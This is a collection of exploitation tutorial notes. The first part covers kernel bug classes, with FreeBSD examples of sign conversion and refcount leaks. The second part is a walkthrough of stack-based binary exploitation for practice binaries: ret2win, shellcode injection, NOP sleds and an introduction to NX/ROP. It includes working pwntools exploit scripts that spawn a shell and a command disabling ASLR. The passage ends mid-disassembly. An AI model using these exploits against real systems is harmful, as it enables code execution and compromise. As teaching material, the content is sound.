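The kernel stack comes into play each time a process enters kernel mode. It is much like the user stack, with a few small differences; for example, its size is usually limited. In addition, the kernel stacks of all processes are part of the same kernel address space, so they start at different virtual addresses and occupy different ranges of it.
Because the kernel stack resembles the user stack, bugs occur in much the same places: unsafe functions (strcpy(), sprintf() and so on), out-of-bounds array accesses, buffer overflows, and the like.
Kernel heap vulnerabilities are usually caused by buffer overflows. An overflow that overwrites the chunk following the overflowed one, or the cache-related metadata, can lead to exploitation.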
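Integer Misuse
Integer overflows and sign conversion errors are the two most common integer misuse bugs. They are often hard to exploit on their own, but they can lead to other bugs, such as memory overflows.
An integer overflow happens when a value outside the range an integer type can store is assigned to a variable of that type. It can also happen in unchecked additions and multiplications when the operands are not validated.
A sign conversion error happens when an unsigned number is treated as a signed one, or vice versa. A classic scenario: a signed value passes a maximum-value check and is then handed to a function that only accepts unsigned values.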
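The unchecked multiplication case can be made concrete with a short sketch. It emulates 32-bit unsigned arithmetic by masking; the helper names are illustrative and not taken from any kernel.

```python
MASK32 = 0xFFFFFFFF

def mul_u32(count, elem_size):
    """Multiply the way a 32-bit unsigned type would, discarding high bits."""
    return (count * elem_size) & MASK32

def checked_mul_u32(count, elem_size):
    """Same multiplication, but refuse results that do not fit in 32 bits."""
    total = count * elem_size
    if total > MASK32:
        raise OverflowError("count * elem_size does not fit in 32 bits")
    return total

# 0x40000001 elements of 4 bytes: the true size is 0x100000004,
# but the truncated result is tiny, so a later copy would overflow the buffer.
print(hex(mul_u32(0x40000001, 4)))
try:
    checked_mul_u32(0x40000001, 4)
except OverflowError as exc:
    print("rejected:", exc)
```

Validating the operands before the arithmetic, as checked_mul_u32() does, is what the vulnerable code paths leave out.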
Here is an example from FreeBSD 6.0:
int fw_ioctl (struct cdev *dev, u_long cmd, caddr_t data, int flag, fw_proc *td)
{
[...]
int s, i, len, err = 0; [1]
[...]
struct fw_crom_buf *crom_buf = (struct fw_crom_buf *)data; [2]
[...]
if (fwdev == NULL) {
[...]
len = CROMSIZE;
[...]
} else {
[...]
if (fwdev->rommax < CSRROMOFF)
len = 0;
else
len = fwdev->rommax - CSRROMOFF + 4;
}
if (crom_buf->len < len) [3]
len = crom_buf->len;
else
crom_buf->len = len;
err = copyout(ptr, crom_buf->ptr, len); [4]
}
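len at [1] is a signed integer, and crom_buf->len is also signed and under our control. If it is set to a negative number, the condition at [3] holds no matter what len is. copyout() is then called at [4]; its prototype is: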
int copyout(const void *__restrict kaddr, void *__restrict udaddr, size_t len) __nonnull(1) __nonnull(2);
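The third parameter has type size_t, an unsigned integer, so a negative len is interpreted as a very large positive number, which results in an arbitrary kernel memory read.
For more, see section 3.1.2.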
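The length logic of fw_ioctl() can be replayed in a few lines. This sketch assumes a 64-bit size_t and models only steps [3] and [4]; copyout_length() is a hypothetical name used for the illustration.

```python
SIZE_T_MASK = (1 << 64) - 1  # assumed 64-bit size_t

def copyout_length(user_len, kernel_len):
    """Return the length copyout() would see for a user-supplied crom_buf->len."""
    length = kernel_len
    if user_len < length:        # [3] signed comparison
        length = user_len
    return length & SIZE_T_MASK  # [4] implicit conversion to size_t

print(hex(copyout_length(16, 0x400)))   # well-behaved caller
print(hex(copyout_length(-1, 0x400)))   # negative length chosen by the attacker
```

The second call yields 0xffffffffffffffff: the negative value sails through the signed comparison and only becomes enormous once it is converted.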
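Race Conditions
A race condition occurs when two or more actors are about to perform an action and the outcome differs completely depending on the order in which they run. There are many ways to avoid races, such as locks, semaphores and condition variables that keep the actors synchronized. The most important property of a race is the size of the race window, which determines how easy it is to trigger. For this reason some races can only be exploited on symmetric multiprocessing (SMP) systems.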
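The dependence on ordering can be shown deterministically, without real threads. The sketch below is a toy model: two actors each perform a read followed by a write on a shared counter, and run() simply replays a given schedule. The names are made up for the illustration.

```python
def run(schedule):
    """Execute (actor, step) pairs against one shared counter."""
    shared = 0
    seen = {}                      # each actor's private copy of the counter
    for actor, step in schedule:
        if step == "read":
            seen[actor] = shared
        elif step == "write":
            shared = seen[actor] + 1
    return shared

sequential = [("A", "read"), ("A", "write"), ("B", "read"), ("B", "write")]
interleaved = [("A", "read"), ("B", "read"), ("A", "write"), ("B", "write")]
print(run(sequential), run(interleaved))
```

The sequential schedule ends with a counter of 2, the interleaved one with 1. The gap between an actor's read and its write is the race window: the wider it is, the more likely another actor slips in between.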
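Logic Bugs
Logic bugs come in many forms; here we look at a reference counter overflow. A shared resource has a reference count and is released when the count drops to zero, which keeps enough memory available. Operating systems usually provide functions such as get and put/drop to increment and decrement the count explicitly.
Here is an example from FreeBSD 5.0: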
int fpathconf(td, uap)
struct thread *td;
register struct fpathconf_args *uap;
{
struct file *fp;
struct vnode *vp;
int error;
if ((error = fget(td, uap->fd, &fp)) != 0) [1]
return (error);
[...]
switch (fp->f_type) {
case DTYPE_PIPE:
case DTYPE_SOCKET:
if (uap->name != _PC_PIPE_BUF)
return (EINVAL); [2]
p->p_retval[0] = PIPE_BUF;
error = 0;
break;
[...]
out:
fdrop(fp, td); [3]
return (error);
}
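The fpathconf() system call retrieves information about a given open file descriptor. At [1] it obtains a reference to the file descriptor structure through fget(), and on exit it releases that reference through fdrop() at [3]. The code at [2], however, returns directly without releasing the reference. Calling fpathconf() repeatedly and hitting the return at [2] each time can therefore overflow the reference counter.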
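The effect of the leaked reference can be sketched with a toy counter. This is a model, not FreeBSD code: RefCounted and fpathconf_model() are hypothetical, and the counter is given only 8 bits so that the wrap-around happens after 255 calls instead of billions.

```python
class RefCounted:
    def __init__(self, bits=32):
        self.mask = (1 << bits) - 1
        self.count = 1          # the reference held by the descriptor table
        self.freed = False

    def get(self):
        self.count = (self.count + 1) & self.mask

    def drop(self):
        self.count = (self.count - 1) & self.mask
        if self.count == 0:
            self.freed = True

def fpathconf_model(obj, hit_error_path):
    obj.get()                   # [1] take a reference
    if hit_error_path:
        return "EINVAL"         # [2] returns without calling drop()
    obj.drop()                  # [3] release the reference
    return 0

obj = RefCounted(bits=8)        # 8 bits so the loop stays short
for _ in range(255):
    fpathconf_model(obj, hit_error_path=True)
print(obj.count)                # the counter has wrapped around
fpathconf_model(obj, hit_error_path=False)
print(obj.freed)                # released while the descriptor table still uses it
```

After the wrap, one ordinary call drops the count to zero and frees the object even though the original reference was never released, which is what turns the leak into a use-after-free.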
Binary Exploitation - Stack
https://ir0nstone.gitbook.io/notes/
Introduction
An Introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilizing them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
Analysis
The challenge has two files - source.c
and vuln
; the latter is an ELF
file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2
to analyze the behavior of the binary when functions are called.
$ r2 -d -A vuln
The -d
runs it while the -A
performs the analysis. We can disassemble the main
with
s main; pdf
s main
seeks (moves) to main, while pdf
stands for Print Disassembly Function (literally just disassembles it).
0x080491ab 55 push ebp
0x080491ac 89e5 mov ebp, esp
0x080491ae 83e4f0 and esp, 0xfffffff0
0x080491b1 e80d000000 call sym.__x86.get_pc_thunk.ax
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
0x080491c1 c9 leave
0x080491c2 c3 ret
The call to unsafe
is at 0x080491bb
, so let's break there.
db 0x080491bb
db
stands for debug breakpoint and just sets a breakpoint. A breakpoint is simply somewhere that pauses the program for you to run other commands when reached. Now we run dc
for debug continue; this just carries on running the file.
It should break before unsafe
is called; let's analyze the top of the stack now:
[0x08049172]> pxw @ esp
0xff984af0 0xf7efe000 [...]
The first address, 0xff984af0
, is the position; the 0xf7efe000
is the value. Let's move one more instruction with the ds
, debug step, and check the stack again.
[0x08049172]> pxw @ esp
0xff984aec 0x080491c0 0xf7efe000
Huh, something's been pushed onto the stack - the value 0x080491c0
. This looks like it's in the binary - but where?
[...]
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
[...]
Look at that - it's the instruction after the call to unsafe. Why? This is how the program knows where to return to after unsafe() has finished.
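The pushed value can also be derived from the bytes of the call instruction itself. The sketch below assumes the 5-byte x86 near call encoding (opcode e8 followed by a 32-bit little-endian relative offset) and uses the address and bytes from the disassembly above; decode_call() is a helper written for this illustration.

```python
import struct

def decode_call(addr, raw):
    """Return (return_address, call_target) for an x86 'call rel32' at addr."""
    if len(raw) != 5 or raw[0] != 0xE8:
        raise ValueError("not a 5-byte call rel32 instruction")
    rel32 = struct.unpack("<i", raw[1:])[0]   # signed, little-endian offset
    ret = (addr + 5) & 0xFFFFFFFF             # address of the next instruction
    target = (ret + rel32) & 0xFFFFFFFF       # offset is relative to that address
    return ret, target

ret, target = decode_call(0x080491bb, bytes.fromhex("e8b2ffffff"))
print(hex(ret), hex(target))
```

The return address comes out as 0x80491c0, the nop after the call, and the target as 0x8049172, which is the address shown in the radare2 prompt once execution is inside unsafe.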
Weaknesses
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe
and break on the ret
instruction; ret
is the equivalent of pop eip
, which will get the saved return pointer we just analyzed on the stack into the eip
register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec
.
[0x080491aa]> pxw @ 0xff984aec
0xff984aec 0x41414141 0x41414141 0x41414141 0x41414141 AAAAAAAAAAAAAAAA
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret
, the value popped into eip
won't be in the previous function but rather 0x41414141
. Let's check with ds
.
[0x080491aa]> ds
[0x41414141]>
And look at the new prompt - 0x41414141
. Let's run dr eip
to make sure that's the value in eip
:
[0x41414141]> dr eip
0x41414141
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc
.
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
radare2
is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault
, which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when making your program, usually by using other C functions such as fgets(); gets() is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets() is always something you should check out in a program. It is also possible to give fgets() the wrong parameters, meaning it still takes in too many characters.
Summary
When a function calls another function, it
- pushes a return pointer to the stack so the called function knows where to return
- when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets()
can prevent such easy overflow, but you should check how much is actually being read.
ret2win
The most basic binexp challenge
A ret2win is simply a binary where there is a win()
function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learned in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple of things:
- The padding until we begin to overwrite the return pointer (EIP)
- What value do we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
Finding the Padding
This can be found using simple trial and error; if we send a variable number of characters, we can use the Segmentation Fault
message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.
We get an offset of 52 bytes.
Finding the Address
Now we need to find the address of the flag()
function in the binary. This is simple.
$ r2 -d -A vuln
$ afl
[...]
0x080491c3 1 43 sym.flag
[...]
afl
stands for Analyse Functions List
The flag()
function is at 0x080491c3
.
Using the Information
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the A
s that we sent became 0x41
- which is the ASCII code of A
. So the solution is simple - let's just find the characters with ASCII codes 0x08
, 0x04
, 0x91
, and 0xc3
.
This is a lot simpler than you might think because we can specify them in Python as hex:
address = '\x08\x04\x91\xc3'
And that makes it much easier.
Putting it Together
Now we know the padding and the value, let's exploit the binary! We can use pwntools
to interface with the binary (check out the pwntools posts for a more in-depth look).
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.clean() # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put a pause()
to give us time to attach radare2
to the process.
from pwn import *
p = process('./vuln')
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
log.info(p.clean())
pause() # add this in
p.sendline(payload)
log.info(p.clean())
Now let's run the script with python3 exploit.py
and then open up a new terminal window.
r2 -d -A $(pidof vuln)
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe()
and read the value of the return pointer.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
<< press any button on the exploit terminal window >>
hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c 0xc3910408 [...]
[...]
0xc3910408
- look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte that carries the most weight in the value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the bytes are stored in reverse order in little-endian executables.
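The reversal is easy to reproduce with Python's standard struct module. This is a small sketch using only the address from this walkthrough; it shows what a little-endian CPU makes of bytes that were sent in big-endian order.

```python
import struct

address = 0x080491c3
big = struct.pack(">I", address)      # most significant byte first, as we sent it
little = struct.pack("<I", address)   # least significant byte first

# A little-endian CPU reading the big-endian bytes sees the reversed value.
misread = struct.unpack("<I", big)[0]
print(big.hex(), little.hex())
print(hex(misread))
print(little == big[::-1])
```

The misread value is 0xc3910408, exactly what showed up on the stack, and the little-endian packing is simply the big-endian bytes in reverse.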
Finding the Endianness
radare2
comes with a nice tool called rabin2
for binary analysis:
$ rabin2 -I vuln
[...]
endian little
[...]
So our binary is little-endian.
Accounting for Endianness
The fix is simple - reverse the address (you can also remove the pause()
)
payload += '\x08\x04\x91\xc3'[::-1]
If you run this now, it will work:
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
And wham, you've called the flag()
function! Congrats!
Pwntools and Endianness
Unsurprisingly, you're not the first person to have thought "Could they possibly make endianness simpler" - luckily, pwntools has a built-in p32()
function ready for use!
payload += '\x08\x04\x91\xc3'[::-1]
becomes
payload += p32(0x080491c3)
Much simpler, right?
The only caveat is that it returns bytes
rather than a string, so you have to make the padding a byte string:
payload = b'A' * 52 # Notice the "b"
Otherwise, you will get a
TypeError: can only concatenate str (not "bytes") to str
Final Exploit
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
log.info(p.clean()) # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
De Bruijn Sequences
The better way to calculate offsets
A De Bruijn sequence of order n is simply a sequence in which no string of n characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
Generating the Pattern
Again, radare2
comes with a nice command-line tool (called ragg2
) that can generate it for us. Let's create a sequence of length 100
.
$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
The -P
specifies the length while -r
tells it to show ascii bytes rather than hex pairs.
Using the Pattern
Now we have the pattern, let's just input it in radare2
when prompted for input, make it crash, and then calculate how far along the sequence the EIP is. Simples.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
The address it crashes on is 0x41534141
; we can use radare2
's in-built wopO
command to work out the offset.
[0x41534141]> wopO 0x41534141
52
Awesome - we get the correct value!
We can also be lazy and not copy the value.
[0x41534141]> wopO `dr eip`
52
The backticks mean the dr eip
is calculated first before the wopO
is run on the result of it.
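What wopO does can be sketched in plain Python: turn the crashing value back into the bytes that were on the stack and look for them in the pattern. The pattern below is copied from the ragg2 output above; pattern_offset() is a helper written for this illustration and assumes a little-endian 32-bit target.

```python
PATTERN = b"AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh"

def pattern_offset(pattern, value, width=4):
    """Return the index at which the bytes of value occur, or -1 if absent."""
    needle = value.to_bytes(width, "little")   # register value back to stack bytes
    return pattern.find(needle)

# Every 4-byte window of the pattern is distinct, so the match is unambiguous.
windows = [PATTERN[i:i + 4] for i in range(len(PATTERN) - 3)]
print(len(windows) == len(set(windows)))
print(pattern_offset(PATTERN, 0x41534141))
```

The value 0x41534141 corresponds to the bytes "AASA", which start 52 characters into the pattern, the same offset radare2 reported.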
Shellcode
Running your own code
In real exploits, it's not particularly likely that you will have a win()
function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
Disabling ASLR
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomizing certain aspects of memory (we will talk about it in much more detail later). This randomization can make shellcode exploits like the one we're about to do less reliable, so we'll be disabling it, for now, using this.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Again, you should never run commands if you don't know what they do.
Finding the Buffer in Memory
Let's debug the vuln binary using radare2 and work out where in memory the buffer starts; this is the address we want the return pointer to hold.
$ r2 -d -A vuln
[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets()
and find the exact address.
[0x08049172]> db 0x080491a8
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
It appears to be at 0xffffcfb4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Finding the Padding
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous section.
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
The padding is 312 bytes.
Putting it all together
In order for the shellcode to be correct, we're going to set the context.binary
to our binary; this grabs stuff like the arch, OS, and bits and enables pwntools to provide us with working shellcode.
from pwn import *
context.binary = ELF('./vuln')
p = process()
We can call just process() because once context.binary is set, pwntools assumes that binary is the one to run.
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
Yup, that's it. Now let's send it off and use p.interactive()
, which enables us to communicate to the shell.
log.info(p.clean())
p.sendline(payload)
p.interactive()
If you're getting an EOFError, print out the shellcode and try to find it in memory - the stack address may be wrong.
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
And it works! Awesome.
Final Exploit
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
log.info(p.clean())
p.sendline(payload)
p.interactive()
Summary
- We injected shellcode, a series of assembly instructions, when prompted for input
- We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
- Once the return pointer got popped into EIP, it pointed at our shellcode
- This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
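To make the byte layout of that payload concrete, here is a minimal sketch using only the standard library. It assumes the 312-byte padding and the 0xffffcfb4 buffer address found above; build_payload is a hypothetical helper, and the "shellcode" is a run of placeholder bytes rather than real output from asm(shellcraft.sh()).

```python
import struct

def build_payload(shellcode: bytes, padding_len: int, return_addr: int) -> bytes:
    """Shellcode first, filler up to the saved return pointer, then the new return address."""
    if len(shellcode) > padding_len:
        raise ValueError("shellcode does not fit before the return pointer")
    payload = shellcode.ljust(padding_len, b"A")  # same idea as payload.ljust(312, b'A')
    payload += struct.pack("<I", return_addr)     # 32-bit little-endian, like p32()
    return payload

fake_shellcode = b"\xcc" * 44  # placeholder bytes, NOT real shellcode
payload = build_payload(fake_shellcode, 312, 0xffffcfb4)
print(len(payload))   # 316
print(payload[312:])  # b'\xb4\xcf\xff\xff'
```

The last four bytes are what overwrite the saved return pointer, so they must hold the buffer address in little-endian order.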
NOPs
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. This makes them very useful for shellcode exploits because all they do is move on to the next instruction. If we pad our exploit on the left with NOPs and point EIP into the middle of them, the CPU will simply keep executing NOPs until it reaches our actual shellcode. This gives us a greater margin of error, as a shift of a few bytes forward or backward won't really affect it; it'll just run a different number of NOP instructions, with the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90
.
The NOP instruction actually used to stand for
XCHG EAX, EAX
, which does effectively nothing. You can read a bit more about it on this StackOverflow question.
Updating our Shellcode Exploit
We can make slight changes to our exploit to do two things:
- Add a large number of NOPs on the left
- Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location may be different.
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = b'\x90' * 240 # The NOPs
payload += asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half nop length
log.info(p.clean())
p.sendline(payload)
p.interactive()
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors when padding with NOPs but the shellcode worked before, try reducing the length of the NOP sled as it may be tampering with other things on the stack.
Note that NOPs are only \x90
in certain architectures, and if you need others you can use pwntools:
nop = asm(shellcraft.nop())
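The margin of error a sled buys can be worked out with a little arithmetic. This sketch assumes the numbers used above (buffer at 0xffffcfb4, 240 NOPs, 312 bytes of padding); sled_target and lands_in_sled are illustrative names, not pwntools functions.

```python
BUFFER_ADDR = 0xffffcfb4  # buffer start found earlier
SLED_LEN = 240            # number of NOP bytes on the left
PADDING_LEN = 312         # bytes before the saved return pointer

def sled_target(buffer_addr: int, sled_len: int) -> int:
    """Aim for the middle of the sled so we can be off in either direction."""
    return buffer_addr + sled_len // 2

def lands_in_sled(addr: int, buffer_addr: int, sled_len: int) -> bool:
    """True if execution starting at addr slides into (or starts exactly at) the shellcode."""
    return buffer_addr <= addr <= buffer_addr + sled_len

target = sled_target(BUFFER_ADDR, SLED_LEN)
max_shellcode_len = PADDING_LEN - SLED_LEN  # room left for shellcode before the return pointer

print(hex(target))        # 0xffffd02c
print(max_shellcode_len)  # 72
```

With these values the buffer can move by up to 120 bytes either way before the return address misses the sled, at the cost of leaving only 72 bytes for the shellcode itself.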
32- vs 64-bit
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switching out the p32()
for p64()
as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8, and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.
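As a rough illustration of the size difference, the default little-endian behaviour of p32() and p64() can be reproduced with the standard struct module. The helper names pack32 and pack64 are made up here, and the register list is the System V (Linux) order quoted above.

```python
import struct

def pack32(value: int) -> bytes:
    return struct.pack("<I", value)  # 4 bytes, little-endian

def pack64(value: int) -> bytes:
    return struct.pack("<Q", value)  # 8 bytes, little-endian

# Registers for the first six integer parameters on 64-bit Linux
SYSV_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

addr = 0xffffcfb4
print(pack32(addr))  # b'\xb4\xcf\xff\xff'
print(pack64(addr))  # b'\xb4\xcf\xff\xff\x00\x00\x00\x00'
```

Note the four extra null bytes in the 64-bit form; functions that stop reading at a null byte will stop there.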
Binary Exploitation - Stack
https://ir0nstone.gitbook.io/notes/
No eXecute
The defense against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralizing the shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
Checking for NX
You can either use pwntools' checksec
or rabin2
.
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
$ rabin2 -I vuln
[...]
nx false
[...]
Return-Oriented Programming
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way as to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command string, such as cat flag.txt, and then pass it as a parameter to system, it will execute that command and return the output. A more dangerous command is /bin/sh, which when run by system gives the attacker a shell much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
Calling Conventions
A more in-depth look into parameters for 32-bit and 64-bit programs
One Parameter
Source
Let's have a quick look at the source:
#include <stdio.h>
void vuln(int check) {
if(check == 0xdeadbeef) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef);
vuln(0xdeadc0de);
}
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Nice!
Not nice!
Just what we expected.
Analyzing 32-bit
Let's open the binary up in radare2 and disassemble it.
$ r2 -d -A vuln-32
$ s main; pdf
0x080491ac 8d4c2404 lea ecx, [argv]
0x080491b0 83e4f0 and esp, 0xfffffff0
0x080491b3 ff71fc push dword [ecx - 4]
0x080491b6 55 push ebp
0x080491b7 89e5 mov ebp, esp
0x080491b9 51 push ecx
0x080491ba 83ec04 sub esp, 4
0x080491bd e832000000 call sym.__x86.get_pc_thunk.ax
0x080491c2 053e2e0000 add eax, 0x2e3e
0x080491c7 83ec0c sub esp, 0xc
0x080491ca 68efbeadde push 0xdeadbeef
0x080491cf e88effffff call sym.vuln
0x080491d4 83c410 add esp, 0x10
0x080491d7 83ec0c sub esp, 0xc
0x080491da 68dec0adde push 0xdeadc0de
0x080491df e87effffff call sym.vuln
0x080491e4 83c410 add esp, 0x10
0x080491e7 b800000000 mov eax, 0
0x080491ec 8b4dfc mov ecx, dword [var_4h]
0x080491ef c9 leave
0x080491f0 8d61fc lea esp, [ecx - 4]
0x080491f3 c3 ret
If we look closely at the calls to sym.vuln
, we see a pattern:
push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln
We literally push
the parameter to the stack before calling the function. Let's break on sym.vuln
.
[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c 0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call
, so it should be at the top of the stack. Now let's disassemble sym.vuln
.
┌ 74: sym.vuln (int32_t arg_8h);
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x08049162 b 55 push ebp
│ 0x08049163 89e5 mov ebp, esp
│ 0x08049165 53 push ebx
│ 0x08049166 83ec04 sub esp, 4
│ 0x08049169 e886000000 call sym.__x86.get_pc_thunk.ax
│ 0x0804916e 05922e0000 add eax, 0x2e92
│ 0x08049173 817d08efbead. cmp dword [arg_8h], 0xdeadbeef
│ ┌─< 0x0804917a 7516 jne 0x8049192
│ │ 0x0804917c 83ec0c sub esp, 0xc
│ │ 0x0804917f 8d9008e0ffff lea edx, [eax - 0x1ff8]
│ │ 0x08049185 52 push edx
│ │ 0x08049186 89c3 mov ebx, eax
